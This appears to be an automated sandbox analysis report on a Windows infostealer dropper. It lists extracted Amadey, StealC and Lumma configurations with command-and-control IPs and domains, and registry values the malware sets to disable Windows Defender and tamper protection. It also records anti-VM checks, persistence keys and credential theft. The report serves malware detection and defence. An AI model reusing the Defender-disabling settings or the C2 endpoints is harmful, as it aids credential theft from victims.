Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 08:48
Static task
static1
Behavioral task
behavioral1
Sample
2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe
Resource
win10v2004-20241007-en
General
-
Target
2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe
-
Size
1.8MB
-
MD5
7f0a76732977427371079aac4e055a2e
-
SHA1
c799adbb85ecde3ed6c2cb17c77ee989d73cc9d6
-
SHA256
2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc
-
SHA512
88ed5cac47d9765cde1e83e489e4f7707176fb167318343e8c58611d4fd315de77125866d79a63ef5400f8a0b51048a0ce77298874bf1b62c3bc34f110761b05
-
SSDEEP
49152:SRom2bAxlKp9HksGRtTvd/oheTzY0/oWnWNm4jDAATj:iom2WlKppG3vt5o4D4jDj
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
default_valenciga
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
lumma
https://drive-connect.cyou
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://drive-connect.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 8b4b459c8c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8b4b459c8c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8b4b459c8c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8b4b459c8c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8b4b459c8c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8b4b459c8c.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 732 created 2492 732 rhnew.exe 42 PID 2276 created 2492 2276 nSoft.exe 42 -
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF c2d4ca6289.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c2d4ca6289.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nSoft.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e3c6c90ef9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8b4b459c8c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fd3ff1536f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rhnew.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ed32995a29.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32810b99b0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b22d8aa3a4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ abc488b187.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 851e234eee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 114 960 powershell.exe 118 960 powershell.exe 120 960 powershell.exe 125 960 powershell.exe 255 4568 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3284 powershell.exe 3216 powershell.exe 1876 powershell.exe 1104 powershell.exe 4964 powershell.exe 1856 powershell.exe 4496 powershell.exe 5976 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e3c6c90ef9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion abc488b187.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 851e234eee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ed32995a29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fd3ff1536f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fd3ff1536f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8b4b459c8c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nSoft.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nSoft.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion abc488b187.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e3c6c90ef9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ed32995a29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32810b99b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32810b99b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b22d8aa3a4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b22d8aa3a4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c2d4ca6289.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8b4b459c8c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c2d4ca6289.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 851e234eee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation abc488b187.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation AllNew.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation am209.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation defnur.exe -
Executes dropped EXE 34 IoCs
pid Process 3176 skotes.exe 2736 DU1zDwm.exe 3212 stories.exe 4436 stories.tmp 1904 videojet.exe 732 rhnew.exe 3520 abc488b187.exe 3588 axplong.exe 2128 stealc_default2.exe 1552 alex2022.exe 4836 alex2022.exe 3540 c2d4ca6289.exe 956 e3c6c90ef9.exe 3196 ed32995a29.exe 4984 AllNew.exe 3772 32810b99b0.exe 1360 33c3247dda.exe 4568 axplong.exe 4700 skotes.exe 3488 trru7rd2.exe 5084 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 2160 am209.exe 1504 8b4b459c8c.exe 4480 defnur.exe 2276 nSoft.exe 5856 fd3ff1536f.exe 5912 newwork.exe 5892 newwork.tmp 3444 b22d8aa3a4.exe 2588 851e234eee.exe 4404 axplong.exe 1376 skotes.exe 348 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 6016 defnur.exe -
Identifies Wine through registry keys 2 TTPs 17 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine e3c6c90ef9.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine ed32995a29.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 8b4b459c8c.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 32810b99b0.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine fd3ff1536f.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 851e234eee.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine rhnew.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine c2d4ca6289.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine abc488b187.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine b22d8aa3a4.exe -
Loads dropped DLL 6 IoCs
pid Process 4436 stories.tmp 1904 videojet.exe 2128 stealc_default2.exe 2128 stealc_default2.exe 5892 newwork.tmp 4568 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 8b4b459c8c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8b4b459c8c.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\851e234eee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005151001\\851e234eee.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e3c6c90ef9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011574001\\e3c6c90ef9.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32810b99b0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011575001\\32810b99b0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\33c3247dda.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011576001\\33c3247dda.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8b4b459c8c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011577001\\8b4b459c8c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b22d8aa3a4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005150001\\b22d8aa3a4.exe" axplong.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nSoft.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 238 raw.githubusercontent.com 239 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d47-621.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 3176 skotes.exe 732 rhnew.exe 3520 abc488b187.exe 3588 axplong.exe 3540 c2d4ca6289.exe 956 e3c6c90ef9.exe 3196 ed32995a29.exe 3772 32810b99b0.exe 4700 skotes.exe 4568 axplong.exe 1504 8b4b459c8c.exe 2276 nSoft.exe 5856 fd3ff1536f.exe 3444 b22d8aa3a4.exe 2588 851e234eee.exe 1376 skotes.exe 4404 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1552 set thread context of 4836 1552 alex2022.exe 133 PID 5084 set thread context of 1444 5084 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 172 PID 348 set thread context of 4964 348 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 210 -
resource yara_rule behavioral2/memory/1444-686-0x0000000140000000-0x00000001408F6000-memory.dmp upx behavioral2/memory/1444-685-0x0000000140000000-0x00000001408F6000-memory.dmp upx behavioral2/memory/1444-689-0x0000000140000000-0x00000001408F6000-memory.dmp upx behavioral2/memory/1444-697-0x0000000140000000-0x00000001408F6000-memory.dmp upx behavioral2/memory/1444-696-0x0000000140000000-0x00000001408F6000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\defnur.job am209.exe File created C:\Windows\Tasks\skotes.job 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe File created C:\Windows\Tasks\axplong.job abc488b187.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0007000000023d3a-655.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 3596 732 WerFault.exe 109 4048 3196 WerFault.exe 142 1124 4836 WerFault.exe 133 5236 2588 WerFault.exe 195 1152 2588 WerFault.exe 195 -
System Location Discovery: System Language Discovery 1 TTPs 60 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abc488b187.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 33c3247dda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 851e234eee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nSoft.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language videojet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AllNew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rhnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd3ff1536f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c2d4ca6289.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 33c3247dda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newwork.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b22d8aa3a4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trru7rd2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newwork.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3c6c90ef9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language am209.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8b4b459c8c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32810b99b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33c3247dda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed32995a29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language defnur.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4480 powershell.exe 1088 PING.EXE 3572 powershell.exe 5888 PING.EXE 4704 powershell.exe 2108 PING.EXE -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2584 taskkill.exe 4224 taskkill.exe 3536 taskkill.exe 1420 taskkill.exe 3340 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
pid Process 1088 PING.EXE 5888 PING.EXE 2108 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2184 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 3176 skotes.exe 3176 skotes.exe 4480 powershell.exe 4480 powershell.exe 4436 stories.tmp 4436 stories.tmp 216 powershell.exe 216 powershell.exe 1104 powershell.exe 1104 powershell.exe 732 rhnew.exe 732 rhnew.exe 732 rhnew.exe 732 rhnew.exe 732 rhnew.exe 732 rhnew.exe 2880 svchost.exe 2880 svchost.exe 2880 svchost.exe 2880 svchost.exe 3216 powershell.exe 3216 powershell.exe 3216 powershell.exe 3520 abc488b187.exe 3520 abc488b187.exe 3588 axplong.exe 3588 axplong.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 3832 powershell.exe 3832 powershell.exe 3832 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe 